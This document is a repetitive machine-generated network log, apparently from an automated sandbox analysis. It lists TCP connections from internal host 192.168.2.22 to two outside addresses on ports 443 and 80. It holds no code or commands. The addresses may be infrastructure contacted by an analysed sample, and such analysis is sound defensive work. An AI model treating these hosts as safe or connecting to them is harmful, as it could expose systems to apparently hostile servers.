Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.45.138:443
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49162
Source: global trafficTCP traffic: 192.168.2.22:49162 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49163
Source: global trafficTCP traffic: 192.168.2.22:49163 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
Source: global trafficTCP traffic: 192.168.2.22:49166 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49164
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 192.168.2.22:49164 -> 91.92.244.96:80
Source: global trafficTCP traffic: 91.92.244.96:80 -> 192.168.2.22:49166
